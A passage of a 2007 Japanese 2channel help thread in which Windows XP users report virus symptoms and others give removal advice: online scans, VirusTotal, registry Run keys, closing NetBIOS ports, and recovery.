 ×「セキュリティーからアラートへのお知らせ」
 ○ システムからアラートへのお知らせ         でした。

全てメッセンジャーから来るもので、
内容はIPアドレスが晒されているとか、プライバシーが危険に晒されてる、SEX FREEがどうのの勧誘みたいなのです。
全部が英語メッセージなので良くわからないですし、メッセージを×を押して消すと
ピッっと警告の音がうるさいです。(音は消してあるのに警告音はなぜかします)

547 :名無しさん@お腹いっぱい。:2007/01/28(日) 11:42:54
音を消してても警告音がなるのはBEEP音だからだろうな
カスペオンラインスキャンでもしてみたらどうかな?体験版もあるし。

Spybot-S&Dはスパイウェア対策であってウイルスはほとんど検知しないよ
AVAS?ってのはAVAST!の事かな?
PCをフォーマットしても全く同じ症状が出てるってのはおかしい事だから、リカバリしたつもりでいて復元しかしていないとかじゃないのかな?
復元だとウイルスやダウンローダ、スパイウェアごと復元してしまうよ

548 :名無しさん@お腹いっぱい。:2007/01/28(日) 11:44:29
>>545
Microsoft Update は、Windows Update で取得できるすべての更新プログラムに加え
Office およびその他の Microsoft アプリケーションを対象とする
優先度の高い更新プログラムを無料で提供するサービスです。

コントロールパネルのセキュリティセンターで自動更新の設定になっていますか?

Spybot S&Dはフリーのスパイウェア対策(予防と駆除)ソフトで、
基本的にはウイルス対策セキュリティソフトではありません。

ファイアウォールの付いた総合セキュリティソフトを入れて、
最低限ブラウザの設定を勉強しましょう

549 :名無しさん@お腹いっぱい。:2007/01/28(日) 11:52:19
exploitつかうタイプ
FW入れてMicrosoft Updateしないといつまでも同じ
マルウェア自体は多分これで消える
http://wiki.higaitaisaku.com/wiki.cgi?page=SmitfraudFix+%A4%CE%BB%C8%A4%A4%CA%FD

550 :名無しさん@お腹いっぱい。:2007/01/28(日) 12:13:15
【使用OS】 WindowsXP HomeEdition(?)
【MicrosoftUpdateの状態】 多分していません
【使用セキュリティソフトとバージョン】 McAfree/Spybot
【セキュリティソフトの定義ファイルは最新の状態であるか】 McAfreeは不明ですが、Spybotは最新です
【ルータの有無】恐らくあります。無線LAN使用しています。
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】 検出無し
【どんな症状が出るか】 PCの電源を入れると普通にデスクトップが表示されます(右下のバー等も)
しかし起動してすぐ(1分程度)に、コマンドプロンプトの様な画面がチラッと出てきます(1行程何か書かれています)
それが表示された直後、PCの電源が切れてしまいます(電源の切れ方は正常です)

【症状が出る前に何をやったか】 vipロダの通常5〜15MBの中の72840か72836をDLしました。
解凍して中を開くと、画像を収録しているフォルダと別のフォルダ(?)が一つありました。
別のフォルダの中にReadMeの様な物があり、そこに書かれている手順に従って同フォルダ内の解凍ソフトを使用しました。
解凍する際に、コマンドプロンプト系の窓が開いたので少し不安だったのですが、とりあえず続行してみました。
すると、解凍(?)を終えた直後にPCの電源が切れました。

【症状を解決しようとどのような処置を取ったか】 SpybotとMcAfeeでスキャンしました。
McAfeeでのヒットは0件、Spybotでは16件程見つかったので全て削除しました。
現在SymantecSecurityCheckを行っています。現時点で感染ファイル4件

【その他の質問】 PCはノートパソコンです。
ニュー速vipで同じウイルスにHITした人が居て、その人はPCの初期化を行ったようです。
自分はバックアップの事がよく分からないので初期化は避けたいと思っています。
※ウイルスに引っかかった後の行動は全てセーフモードで行っています

551 :名無しさん@お腹いっぱい。:2007/01/28(日) 12:16:31
連レスすいません。SymantecSecurityCheckでのスキャンが終わりました。
感染しているのが4つ見つかったので書き込んでおきます。

SystemDoctor に感染しています。
VBS.Freelink.B に感染しています。
SystemDoctor に感染しています。
SystemDoctor に感染しています。

552 :名無しさん@お腹いっぱい。:2007/01/28(日) 12:28:40
>>551
釣り乙

553 :名無しさん@お腹いっぱい。:2007/01/28(日) 12:44:06
>>552
何故釣りと断定されてるかは分かりませんが、本当に困ってます。。

554 :名無しさん@お腹いっぱい。:2007/01/28(日) 12:58:52
>>553
リカバリしたくないならアダ被で質問したほうがいいよ
http://www.higaitaisaku.com/removewz01.html
ただし解決まで時間がかると思う


555 :名無しさん@お腹いっぱい。:2007/01/28(日) 13:19:02
>>554
なるほど、ありがとうございます
なるべく早く解決したいので、出来ればコチラでお世話になろうと思います

556 :名無しさん@お腹いっぱい。:2007/01/28(日) 13:34:53
>>555
自分でウイルスやスパイウェアに感染しておいて何が早く解決したいだよ。
駆除するとなると時間は掛かるもの。
早く解決したいならリカバリとしか言えないな。

557 :名無しさん@お腹いっぱい。:2007/01/28(日) 13:58:36
>>556
他の方も自分でウイルスやスパイウェアに引っかかったと思うんですが・・・
皆さんに頼りすぎたところはあったと思います。すいません。
今はCドライブを初期化するための方法を調べています

558 :名無しさん@お腹いっぱい。:2007/01/28(日) 14:38:52
すみません質問です。
ウィルスセキュリティーを使ってるんですが
「トロイの木馬を対処しました」
「セキュリティーレベルを低から中へ引き上げました」
とメッセージがでたんですが、トロイの木馬とやらはどこへいってしまったんでしょうか?
対処=消去? 本当に安全なのか不安です。どなたかご教授願います
ウィルスセキュリティーのスレで質問したんですがからかわれてしまいまして…

559 :名無しさん@お腹いっぱい。:2007/01/28(日) 14:49:04
そりゃそのソフトのスレに行って聞けよ

560 :名無しさん@お腹いっぱい。:2007/01/28(日) 14:51:46
>>558
ウイルスセキュリティZEROは「対処しました」「駆除しました」
で感染してたりするからな
まずはオンラインスキャン逝ってこい
話はそれからだ

561 :名無しさん@お腹いっぱい。:2007/01/28(日) 14:53:43
>>557
.batで電源切るよう仕込んでおき→再起動→マルウェアインストール完了
そnな希ガス

SystemDoctorはプログラムの追加と削除からアンインストールできるはず
レジストリにも書き込みあるはずだからレジストリをSystemDoctorで検索→削除
VBS.Freelink.B→ノートントラップ→放置

ほかにも感染してたらシラネ

562 :名無しさん@お腹いっぱい。:2007/01/28(日) 14:59:20
VBS.Freelink.B はスキャンにもひっかかるから気になるならノートンアンチウィルスを開いて
レポート→検疫と復元を表示→セキュリティの脅威を選択→削除
で消える
ウィルスコード貼ってあるスレにでも行けばまたすぐできてるだろうけど

563 :名無しさん@お腹いっぱい。:2007/01/28(日) 15:01:43
>>562
だんな オンラインスキャンでっせ

564 :名無しさん@お腹いっぱい。:2007/01/28(日) 15:31:23
AVAST!ってウィルスフリー駆除ソフトつかってるんだけど
昨日普通のいつもひらいてるファイルひらこうとしたら今
トロイの木馬がみつかりました!!とかいわれたんだけど・・・
いつもひらいてる普通のファイルだったし
これフリーソフトだし、ノートン先生は発動しなかったしエラー?
とおもって
ほっとく押してしまったんですけど、これは感染してるのでしょうか?(´・ω・`)
だとしたら駆除されてないですよね?


565 :名無しさん@お腹いっぱい。:2007/01/28(日) 15:35:59
>>557
あと起動時に電源が切れるのは.batが自動起動エントリに追加されてるからだろな
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
周りに怪しい.batがないかチェック
みつかったらバックアップとって削除 問題なければそのまま削除
わけわかんないなら アダ被行くかリカバリ推奨



566 :名無しさん@お腹いっぱい。:2007/01/28(日) 16:27:54
>>558
ウィルスセキュリティーはようしらんけどウイルスログとか隔離フォルダとかないの?
ないなら確認する方法はないよ

567 :名無しさん@お腹いっぱい。:2007/01/28(日) 16:28:14
オンラインスキャンってどこでやるの?
どこにあるの?

568 :名無しさん@お腹いっぱい。:2007/01/28(日) 16:30:51
このスレの>>8


569 :名無しさん@お腹いっぱい。:2007/01/28(日) 16:47:21
>>564

だれかお願いします(´;ω;`)
本当に困ってます・・・・・

570 :名無しさん@お腹いっぱい。:2007/01/28(日) 16:59:24
>>569
>>1のテンプレをつかって状況をさらに詳しく
ファイルサイズが10MB以下ならhttp://www.virustotal.comにアップロードしてみて
他のアンチウイルスベンダーのスキャン結果をみてみる
avastはちょくちょく誤検出をおこすのでその可能性も大


571 :545:2007/01/28(日) 17:56:40
>>547->>549

レスありがとうございます。

もう一度、パーテーションのフォーマットと、549さんに教えていただいたのをやってみましたが駄目でした。
メッセンジャーサービスから、私のIPアドレスに送ってくるようですので
IPを変えるしかないのでしょうか?
そもそも、メッセンジャーサービスなるものがわからない。
プロバイダーを変えたらIPアドレスは変更できるのでしょうか???

572 :名無しさん@お腹いっぱい。:2007/01/28(日) 18:02:43
なんか中華系のサイトが定期的に開くんだよ・・・
最終的にOS読み込まずに立ち上がらなくなる
リカバリーしても一緒・・・
最悪
対処法あればよろしく

573 : ◆N9P3SuvBPo :2007/01/28(日) 18:05:17
>545-546
解決したか?

症状は「メッセンジャーから英文のメッセージが届く」ということですよね。
これは恐らく、"メッセンジャースパム"のものだと思います。

対処方法を記載しておくので、参考に
ttp://www.higaitaisaku.com/messengerspam.html

574 : ◆N9P3SuvBPo :2007/01/28(日) 18:08:04
>572
>リカバリーしても一緒・・・
マジっすか?
中華系のサイトが開くだけなら、リカバリで直るはずなんだけど…
他に何か症状とかは無いんですよね?

575 :名無しさん@お腹いっぱい。:2007/01/28(日) 18:11:01
>>574
このスレの>>394をとりあえず実行してみた
俺の場合は古い型のPCなんでwin98をインスコしてからXPいれるんだけど
win98なら何も反応せず、XPをいれたとたんに中華系サイトが開き出す。


576 :名無しさん@お腹いっぱい。:2007/01/28(日) 18:14:05
他の症状といえば
例えばCドライブを開いたり、外付けHDDを開いただけで
デスクトップ上に中華サイトにアクセスするIEのアイコンがでます
で、どんどんサイトが開いて、PCが落ちる
それからはOSすら読み込んでくれない・・・・
これ最悪

577 : ◆N9P3SuvBPo :2007/01/28(日) 18:29:54
>576
Fujacks系ウイルスかな?

(win98からwinXPにグレードアップしたら、症状発生か…)
Win98からWinXPにする間は、ネットから切った状態でやってる?

あと、もしFujacks系なら感染したファイル(拡張子がexe)のアイコンが
パンダや犬など動物のアイコンに変化するのだが、
この症状は、無かったですか?

578 :名無しさん@お腹いっぱい。:2007/01/28(日) 18:36:20
>>577
Setdebug.exe
Jdbgmgr.exe
これが熊のぬいぐるみ見たいなアイコンになってるけどこれは違いますよね?

579 : ◆N9P3SuvBPo :2007/01/28(日) 18:38:17
>578
正規ファイル問題ありません。
現在、中華系サイトが開くといった症状は?

580 :名無しさん@お腹いっぱい。:2007/01/28(日) 18:40:45
>>579
現在は98に戻してるので問題はありません

581 :名無しさん@お腹いっぱい。:2007/01/28(日) 18:43:22
もう一回XP入れます。
次はLANはずしてやってみます

582 :名無しさん@お腹いっぱい。:2007/01/28(日) 20:11:03
もし非常駐型のウィルスに感染した場合、ほっといても悪さしませんよね?

583 :名無しさん@お腹いっぱい。:2007/01/28(日) 20:34:09
【使用OS】 XP
【MicrosoftUpdate】してます
【使用セキュリティソフト】 ノートン2006
【セキュリティソフトの定義ファイルは最新の状態であるか】してあります
【ルータの有無】 有
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】
 ウイルス検出されず。オンラインでも
【どんな症状が出るか】 起動したら、即自動定期にシャットダウン。
その時、コマンドプロンプトも起動されます。されてからシャットダウンです。
シャットダウンが早すぎて、何が描かれてるかわかりません。
【症状が出る前に何をやったか】UPローダのファイルを開きました。
【症状を解決しようとどのような処置を取ったか】 ウイルス検索
【その他の質問】


584 : ◆N9P3SuvBPo :2007/01/28(日) 20:50:09
>583
症状が>550と一緒だ…
セーフモードでシステムの復元はどうだ?

585 :583:2007/01/28(日) 20:57:16
550さんと同じ症状です。
それも、同じファイルを開けてらっしゃいます。
システムの復元試してみます。もしだめだったら、セットアップしなおせば
いいでしょうか?

586 :名無しさん@お腹いっぱい。:2007/01/28(日) 20:58:58
>>583
即シャットダウンするのにどうやってウイルススキャンしたの?

587 :名無しさん@お腹いっぱい。:2007/01/28(日) 20:59:34
出来ればそのファイルうp。

588 :583:2007/01/28(日) 21:03:21
妹のパソコンにその症状が現れたらしく、妹に聞くところ、「Alt」「Ctrl」
「Delete」をしたところ、シャットダウンがしなくてオンラインスキャンを
したとのこと、でも、実際に自分でやってみたけどシャットダウンします。
明日、パソコン屋にもって行っていくといっていたんで、今、何とかできた
らとここに書き込みさせていただいております。

589 :名無しさん@お腹いっぱい。:2007/01/28(日) 21:08:01
>>490
またしても「NOD32」で検出できないウイルスが出現したみたいです…。
やっぱり今回も、何社もの製品が検出できているのに。

代表的な検出名:Trojan.Doropper
http://vista.crap.jp/img/vi6992792988.jpg
http://www.virustotal.com/

590 :545:2007/01/28(日) 21:10:14
>>545です。

>>573
ありがとうございます!
正しくこれでした。
次々に送られてきて、警告音は鳴るし本当に怖かったんですが
こちらのIPアドレスが特定されてたわけじゃなかったんですね。安心しました。

サイトの通りにやったら解決しました。
本当にありがとうございました。

591 :名無しさん@お腹いっぱい。:2007/01/28(日) 21:11:11
>>588
Alt+F4の間違いじゃ・・・。
それで出来たらバックうpとってリカバリーが確実だと思う。

592 : ◆N9P3SuvBPo :2007/01/28(日) 21:14:22
>590
どういたしまして

>588
セーフモードでシステムの復元は効果ありませんでしたか…
あと思いつくのはリカバリくらいしか…

593 :名無しさん@お腹いっぱい。:2007/01/28(日) 21:20:47
>>581です
XPいれてマカフィーで検索したら
トロイでたくさんでてきますた
でも検出場所がJaneだったり・・・・なんか変です

594 :593:2007/01/28(日) 21:22:09
エクスプロラー、もしくはexeファイルに感染してるってことなのかな?
疎いのでわかりません><

595 :583:2007/01/28(日) 21:28:07
Alt+F4 も無理でした。
回答ありがとうございました。
リカバリー方向で考えます。
リカバリーの場合は、OSソフトとその他のハードウェアのソフトがあれば
だいじょぶですよね?初心者のもので。

596 : ◆N9P3SuvBPo :2007/01/28(日) 21:38:51
>593
検出場所がJaneってことは2ch専ブラのログファイルだから問題無し。
まだネットに繋いでないんですよね?

・ルータは有る?
・ファイアーウォールは、Windowsのとマカフィーのどっち?

>595
初めてのリカバリか…
メーカーによってやり方が異なるので、説明書見たほうがいいぜ。

597 :名無しさん@お腹いっぱい。:2007/01/28(日) 21:51:17
>>596
お前ホントいい奴だな・・・

598 : ◆N9P3SuvBPo :2007/01/28(日) 21:54:51
>597そっすか?
困っている人、助けたいと言う気持ちは誰も変わらないと思いますが

599 :名無しさん@お腹いっぱい。:2007/01/28(日) 22:08:26
◆N9P3SuvBPo
神の生まれかわりじゃ・・・・
ありがたやありがたや

600 :名無しさん@お腹いっぱい。:2007/01/28(日) 22:16:25
>>589
画像が消えるの早すぎ。

601 :名無しさん@お腹いっぱい。:2007/01/28(日) 22:21:51
【使用OS】 WINDOWS XP HE V2002 SP2
【使用セキュリティソフト】 ウイルスバスター2007
【セキュリティソフトの定義ファイルは最新の状態であるか】最新
【ルータの有無】 有
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】 無し
【症状が出る前に何をやったか】 覚えてません
【どんな症状が出るか】
ルーターの電源を入れなおすと毎回、以下の画面が右下に表示されます。

ソフトウェアによりインターネットからの情報の受信が要求されています。
不明
システム
疑わしいプログラムより、インターネットからリスニングソケットでのデータ受信が要求されています。
ポート 139
プロトコル TCP
接続先IPアドレス 0.0.0.0

許可OR拒否が選べるので、毎回拒否しております。
以前はこのようなことはありませんでした。
何卒ご教授お願いします

602 : ◆N9P3SuvBPo :2007/01/28(日) 22:26:49
>601
ポート139といえば、NetBIOSだな。
しばらく拒否のまま様子見でいいんじゃね?

拒否にしといても不具合は無いと思いますけど

603 :名無しさん@お腹いっぱい。:2007/01/28(日) 22:50:13
>>602
レス大変感謝します。
NetBIOSをググってみます。

これ、警告表示される時に、数秒で勝手に消えてしまうんですよね。
拒否か許可か選択する前でも。
更には、「今後このエラーに関しては表示しない」ってチェックボタンがあって、
デフォルトでチェックが入ってるのもやっかいです。
ルーターの電源入れなおした後は、マウス握って常にスタンバってないといけないので。


604 :名無しさん@お腹いっぱい。:2007/01/28(日) 22:58:49
>603
ルータ入れてて139に来るのか?
それはおかしい

605 :名無しさん@お腹いっぱい。:2007/01/28(日) 23:05:24
>>604
レス感謝します。
パソコンはあまり詳しくないです。
ADSLを利用してます。
電話回線とPCの間にあるあの機械ってルーターでしたよね?
間違ってたらすいません。





606 :名無しさん@お腹いっぱい。:2007/01/28(日) 23:08:12
ポート139はイントラネット・LANなどを利用してるなら開けるとあるのですが、
LANなどは一切使用しておりません。
ポート139は閉じてもよろしいでしょうか?

http://www.saturn.dti.ne.jp/~jpug/doc/network/win_port_sec.html
↑ここのサイトを見て、ポート139と445を閉じようかと思うのですが・・・

インターネットに公開しているサーバは話が別だ。
公開サーバで139と445番ポートを開けておくのは非常に危険である。
外部に公開するサーバでは、これらのポートを開けておくべきではない。
ファイル・サーバをインターネット経由で利用するのは自殺行為に等しく、
139と445番ポートは必ずふさいでおくべきだ。
同じことはADSLで常時インターネットに接続しているクライアントにもいえる。

139番を閉じるには、137,138番と同様に「NetBIOS over TCP/IPを無効にする」を選べばよい。
445番を閉じるには「コントロールパネル」→「システム」→「ハードウェア」→
「デバイスマネージャ」の「表示」メニューから
「非表示のデバイスドライバの表示」を選ぶと「プラグアンドプレイではないドライバ」
という項目が一覧に加わる。
このツリーを展開して「NetBIOS over TCP/IP」のプロパティを開く。

ここで「ドライバ」タグを選択し、
「スタートアップ」の種類を「無効」にする。




607 : ◆N9P3SuvBPo :2007/01/28(日) 23:09:12
>605
それモデムってやつ
モデムとPCの間にあるのがルータ

608 :名無しさん@お腹いっぱい。:2007/01/28(日) 23:11:48
ノートンを入れていますが、勝手にメールを送信しようとする
質問者:sayalove ウイルス情報は最新(10/4)にして、スキャンしましたが、ウイルスは発見されませんでした。しかし、ウイルスと思われる症状があります。
パソコンを起動すると「メッセージ○/○スキャン中」というメッセージが次々に開き、ダイアログも次々に開きます。
(例)
電子メールメッセージ
送信先は、
件名は)
を送信できませんでした。
メールサーバーに対する接続が中断したためです。電子メールクライアントを開いてメッセージ送信フォルダからメッセージを再送してください
・・と書かれています。


こんな感じなのですが、どうすればいいのでしょうか?





609 :名無しさん@お腹いっぱい。:2007/01/28(日) 23:11:50
>>604
大変申し訳ないです。
ADSLのはモデムですね。
基本的な間違いで誤解を与えました。すいません。


610 :名無しさん@お腹いっぱい。:2007/01/28(日) 23:15:01
>>598
何かムカついた。

611 :名無しさん@お腹いっぱい。:2007/01/28(日) 23:15:52
>>608
はいはい、マルチマルチ。

612 :名無しさん@お腹いっぱい。:2007/01/28(日) 23:18:06
>>607
質問させて下さい。
この警告が出るということは、
私のPC内にウイルスバスターでは検出されないスパイウェア等が動作をしてるということなのでしょうか?
それとも、私のPCは何ら問題ないが、ネットワークの向こう側の何かが毎回一方的に何かをしようとしてるのでしょうか?
お答えいただければ幸いです。


613 :名無しさん@お腹いっぱい。:2007/01/28(日) 23:19:27
>>607
質問させて下さい。
この警告が出るということは、
私のPC内にウイルスバスターでは検出されないスパイウェア等が動作をしてるということなのでしょうか?
それとも、私のPCは何ら問題ないが、ネットワークの向こう側の何かが毎回一方的に何かをしようとしてるのでしょうか?
お答えいただければ幸いです。


614 :名無しさん@お腹いっぱい。:2007/01/28(日) 23:20:03
>>609
いや、ルータ内蔵モデム鴨試練

615 :名無しさん@お腹いっぱい。:2007/01/28(日) 23:24:10
>>614
レス感謝します。
説明書を探して見てみます。



616 :名無しさん@お腹いっぱい。:2007/01/28(日) 23:25:28
>614
それだと139に来るのがわからない

>613
ネットの向こうで何かしようとしてきてブロックしてる
OKだよ

617 :名無しさん@お腹いっぱい。:2007/01/28(日) 23:26:20
質問させて下さい。
この警告が出るということは、
私のPC内にウイルスバスターでは検出されないスパイウェア等が動作をしてるということなのでしょうか?
それとも、私のPCは何ら問題ないが、ネットワークの向こう側の何かが毎回一方的に何かをしようとしてるのでしょうか?
お答えいただければ幸いです。

618 :名無しさん@お腹いっぱい。:2007/01/28(日) 23:30:03
>>616
レス感謝します。


勝手に二重カキコになってしまいます。
急に人大杉になってるし。
遠隔操作でもやられてるのかとビビッテしまっています。

619 :名無しさん@お腹いっぱい。:2007/01/28(日) 23:33:55
モデムは↓これです。
http://www.access.fujitsu.com/products/anet/adsl/m1/index.html
サイト内には「ルータタイプ」と書いてあります。


620 :601:2007/01/28(日) 23:39:59
はっきり覚えてませんが、かれこれ1ヶ月弱ぐらいこの状況が続いてます。

>>616さんが言う内容だと、
私がモデムの電源を入れ直す(IPアドレスとかが変更されるのでセキュリティー上、良いことと習ったので。)度に、
毎回毎回、特定の人物か特定の機械(プログラム?)が、私のPCの中を覗こうとしているということでしょうか?
電源入れなおしはIPアドレスが変わるので、瞬時に毎回それを捕捉してるということは一体どういうことなんでしょうか?
質問ばかりで大変申し訳ありません。

621 : ◆N9P3SuvBPo :2007/01/28(日) 23:43:30
>618
人大杉は専ブラで回避できるよ

本当はセキュリティ初心者スレで聞く質問なんだけどね。

622 :601:2007/01/28(日) 23:45:40
>>621
申し訳ありません。
初心者スレの存在を忘れてました・・・


623 : ◆N9P3SuvBPo :2007/01/28(日) 23:49:24
>622
いやいや、ここまで来たんだからもうここで質問しても良いと思うよ。

624 :名無しさん@お腹いっぱい。:2007/01/28(日) 23:51:28
>620
610さんを特定してるわけではないよ
そういうのがネット上では無数に流れてるということ
だからネット繋ぐときはFW機能が必要ってことだ

>621
すまん。これで終わる。

625 :601:2007/01/29(月) 00:03:21
>>623
ありがとうございます!

>>624
なるほど。
>>だからネット繋ぐときはFW機能が必要ってことだ
「FW」で思い出したのですが、もしかしたらFW機能をONにしたからかもしれません。
以前は、ウィンドウズのFW機能があるからいいや、干渉しあったりするかもしれないし、と勝手に思って、
ウイルスバスターのFWは起動させていませんでした。
はっきりは覚えてませんが、FWをONにした以降にこの現象がでるようになったかもしれません。
ウイルスバスターのFWがしっかり働いてくれているということですよね。
それにしても、ここまで毎回、向こうから何かしようとしている存在があるとは知りませんでした。
以前は一切こういうことは無かったので。
2007のFWの性能がいいということなのでしょう。以前のバージョンだと無反応でしたので。
とにかく2007がよく働いてくれている証拠と思って、あまり気にしないようにします。
沢山のレス大変ありがとうございました。



626 :名無しさん@お腹いっぱい。:2007/01/29(月) 17:47:36
【使用OS】 windows XP sp2
【MicrosoftUpdate】 最新
【使用セキュリティソフト】 avast! 4.7 home・bitdefender コマンドライン版
【セキュリティソフトの定義ファイルは最新の状態であるか】 はい
【ルータの有無】 無
【スキャンの結果何が検出されたか】 Win32:Trojan-gen. {Other}
【どんな症状が出るか】 未確認
【症状が出る前に何をやったか】 特に無し
【症状を解決しようとどのような処置を取ったか】 特に無し
【その他の質問】
avast!のスクリーンセーバー起動中検査で検出されました。
ファイルはC:\Program Files\Rainmeter\uninst.exe
およびRainmeterのインストーラです。
Rainmeterの導入は二ヶ月ほど前ですが、
今までこのファイルが検出されたことはありません。
BitdefenderではError: File query failedと出て検査出来ず。
avast!の誤検出かと思い圧縮してALWILに提出しようとしましたが
Lhaplusでエラーが出てzip圧縮出来ませんでした。
BitdefenderやLhaplusの挙動がこんな感じということは
やはりこれは怪しいファイルなのでしょうか?

627 : ◆N9P3SuvBPo :2007/01/29(月) 18:23:34
>626
このC:\Program Files\Rainmeter\uninst.exeを
ttp://www.virustotal.com/で調べる

628 :名無しさん@お腹いっぱい。:2007/01/29(月) 18:51:36
>>627
有難うございます。
こんな便利なオンラインスキャンがあったんですね。
早速調べてみたところno virus foundが並んだので
喜んだのも束の間、ファイル情報のFile sizeの項目が0bytesでした。
このファイルが検出されたときに一度チェストに退避させたので、
復元させてみましたがファイルは現れるのに実行出来ません。
アクセス許可がない可能性があるという警告が出ます。
この操作でファイルは元通りになっているはずですよね?
bitdefenderなどのプログラムがエラーを出すのもこのせい
だと思われます。
しかしこれでは何故avast!だけ反応するのか余計に分かりません。

629 : ◆N9P3SuvBPo :2007/01/29(月) 19:10:43
>628
avastの過剰反応or誤反応だろうな。

しかしアクセス許可が無いというのはどうもな〜…
リカbいやいやいや
他の人なら何か知ってるかも。

630 :名無しさん@お腹いっぱい。:2007/01/29(月) 19:29:47
これか
http://www.virustotal.com/vt/en/resultadof?f7748772942bd8778dfd96efb06ea221

avast以外すべて no virus found

不安ならavastきってRainmeter最ダウンロードしてavastにおくってみれば?

631 :名無しさん@お腹いっぱい。:2007/01/29(月) 23:28:35
>>629-630
どうも有難うございます。
rainmeterの作者サイトとCOW&SCORPIONから
ダウンしてみようとしたらやはりどちらもavastが反応しました。
どうやら昨日から今日にかけての定義更新で誤検出が
起きるようになったようです。
それからアクセス許可の件ですが、
どうやらavastの常駐保護を完全に切っていないと、
感染したと判断されたファイルはたとえ復元しても
実行不可になるようでした。
とんだ早とちりだったようで、皆様お騒がせしてすいませんです。
私もリカbいやいやいやとなっていたので正直ほっとしています。
早速ALWILに誤検出レポートを送ろうと思います。

632 :ROM専だった人:2007/01/30(火) 08:33:39
>>スレの皆さん

ここのおかげでデスクトップの復旧が出来ました。
本当に助かりました、ありがとうございます。

これで今晩はぐっすり眠れるんだお(^ω^ )♪

633 :名無しさん@お腹いっぱい。:2007/01/30(火) 12:33:01
goggleを踏んでしまいました
ポップアップブロックされて特に何も起きませんでしたが・・・

【使用OS】 XP SP2
【MicrosoftUpdate】 先ほど確認した所最新の更新データはありませんでした
【使用セキュリティソフト】 avast4.7
【セキュリティソフトの定義ファイルは最新の状態であるか】
【ルータの有無】 有
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】
【どんな症状が出るか】 今の所何も起きてません
【症状が出る前に何をやったか】
【症状を解決しようとどのような処置を取ったか】ログにある様に カスペルスキー:オンライン ウイルススキャンを現在実行中です
【その他の質問】XPSP2なら全てブロックするとも書いてありましたが、実際の所どうなんでしょうか?

634 :名無しさん@お腹いっぱい。:2007/01/30(火) 12:34:02
sage忘れ

635 :名無しさん@お腹いっぱい。:2007/01/30(火) 12:45:25
最近はフリーの製品の方が、有料製品よりも活躍しているっぽい。

224 名前:名無しさん@お腹いっぱい。 [sage] 投稿日:2007/01/23(火) 09:21:32
NODで検出できないルートキットが出たよ。
http://vista.crap.jp/img/vi7012763290.jpg

457 名前:名無しさん@お腹いっぱい。 [sage] 投稿日:2007/01/25(木) 12:01:17
また"NOD32"で、まだ検出できないウイルスが出現した('A`)
ちゃんと検出できている製品もあるのに。

代表的な検出名:PoisonIvy.j(バックドアの一種)
http://vista.crap.jp/img/vi7012774443.jpg
http://www.virustotal.com/


112 名前:名無しさん@お腹いっぱい。 [sage] 投稿日:2007/01/28(日) 21:10:05
再び「NOD32」で検出できないウイルスが出現したみたいです…。
やっぱり今回も、何社もの製品が検出できているのに。

代表的な検出名:Trojan.Doropper
http://vista.crap.jp/img/vi7012782119.jpg
http://www.virustotal.com/


344 名前:名無しさん@お腹いっぱい。 [sage] 投稿日:2007/01/30(火) 12:13:14 ID:S6Q5YfM90
四度も立て続けに、NOD32でまだ検出できないウイルスが出たみたいで。
もはやNOD32では、そこそこの安心感も得られない時代になったのを実感した。

Avast検出名:Delf-BAW
http://vista.crap.jp/img/vi7007571352.jpg
http://www.virustotal.com/

636 :名無しさん@お腹いっぱい。:2007/01/30(火) 16:12:30
韓国から落した電子部品PDF
開けないので
NET検索では未検出ですが
KA7500.PDF  .exe
351KB 07/01/04 20:32
Ka750ap.pdf .
4253KB 06/10/05 12:46

KA7500.PDF偽装ファイル? トロイぽで報告
MZP・…略This program must be run under Win32

0EBPak|setup.exe|SETUP|0|

Ka750ap.pdf
MZ略This program cannot be run in DOS mode


ペンギンでは見れないPDFのMS拡張?て事ないですよね

637 :名無しさん@お腹いっぱい。:2007/01/30(火) 19:11:50
PDF  .exeの時点でoutでしょ


638 :名無しさん@お腹いっぱい。:2007/01/30(火) 23:05:24
質問
ウイルスexeをjpgやavi等に偽装したやつ(空欄..exeではない)をダブルクリックしたとしても
ビューアやプレイヤーが立ち上がるだけで感染はしないよね?セキュリティーホールでもない限り…

空欄.exeは気をつけるとして上記の件は心配無用ですか?

639 :名無しさん@お腹いっぱい。:2007/01/30(火) 23:28:31
【使用OS】XP SP2
【MicrosoftUpdate】してます
【使用セキュリティソフト】avast! 4.7
【セキュリティソフトの定義ファイルは最新の状態であるか】最新
【ルータの有無】なし
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】
nortonのオンラインチェック
 C:\Documents and Settings\Local Settings\Temporary Internet Files\Content.IE5\XFVVDHCA\goldfish.xls[1].xls は W32.Yaha@mm に感染しています。
  C:\Documents and Settings\Local Settings\Temporary Internet Files\Content.IE5\B2SBZH0X\goldfish.xls[1].xls は W32.Yaha@mm に感染しています。

【どんな症状が出るか】特になし
【症状が出る前に何をやったか】ブラクラを踏んだ
【症状を解決しようとどのような処置を取ったか】
  avast! 4.7でスキャンし、出てきたウイルスを削除
nortonのオンラインチェック⇒上記のウイルス検出
nortonのサイトから無料駆除ツールYaha@mm用をDL後スキャン⇒感染ファイルなしと出る
改めてnortonのオンラインチェック⇒上記のウイルスは検出される
【その他の質問】どうすれば駆除できますか?

640 :名無しさん@お腹いっぱい。:2007/01/30(火) 23:29:30
>>638
感染するにきまってんだろバーロー
ファイル名で判断すんな

641 :名無しさん@お腹いっぱい。:2007/01/30(火) 23:40:11
>>640
ファイル名てか拡張子なんだが…
.aviや.jpgならビューアーやプレイヤー等のアプリに関連付けされてると思うんだけど
それらを介して感染するってことだよね?
爆発的に広まるんでわ…

642 :名無しさん@お腹いっぱい。:2007/01/30(火) 23:50:57
>>638
それで感染するようなら大パニックになるな。
しかしaviファイルで感染したという報告もあるようだが。

643 :名無しさん@お腹いっぱい。:2007/01/30(火) 23:52:41
【使用OS】 windowsXP homeedition
【MicrosoftUpdate】 してる。
【使用セキュリティソフト】 nis2007
【セキュリティソフトの定義ファイルは最新の状態であるか】 最新です
【ルータの有無】 なし
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】
 VBS Loveletter.A
【どんな症状が出るか】 お気に入りにdesktopというのが増えている
【症状が出る前に何をやったか】 2ch巡回中ブラクラを踏んだ
【症状を解決しようとどのような処置を取ったか】 nisで完全スキャンしてウイルス検出
【その他の質問】 完全削除できたでしょうか?復元するみたいな事も書いてあるので心配です

